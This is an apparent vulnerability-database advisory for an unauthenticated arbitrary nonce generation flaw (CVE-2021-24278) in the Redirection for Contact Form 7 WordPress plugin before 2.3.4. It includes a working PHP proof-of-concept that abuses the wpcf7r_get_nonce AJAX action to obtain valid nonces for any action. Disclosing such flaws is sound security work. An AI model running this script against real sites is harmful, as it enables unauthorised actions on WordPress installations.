Lucene search
Chloe ChamberlandWPEX-ID:99F30604-D62B-4E30-AFCD-B482F8D66413HistoryApr 20, 2021 - 12:00 a.m.
Redirection for Contact Form 7 < 2.3.4 - Unauthenticated Arbitrary Nonce Generation
2021-04-2000:00:00
Chloe Chamberland
182
php
curl
nonce
unauthenticated
exploit
wordpress
form security
ajax
redirection
EPSS
0.109
Percentile
95.2%
In the plugin, unauthenticated users can use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.
<?php
// Settings
$wp_url = $argv[1];
// Get nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'action' => 'wpcf7r_get_nonce',
'param' => '[ANY ACTION HERE]'
]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>Related
prion
prion
Design/Logic Flaw
2021-05-14 12:15:00
cve
cve
CVE-2021-24278
2021-05-14 12:15:08
nuclei
nuclei
WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation
2021-11-26 23:32:48
wpvulndb
wpvulndb
nvd
nvd
CVE-2021-24278
2021-05-14 12:15:08
cvelist
cvelist
openvas
openvas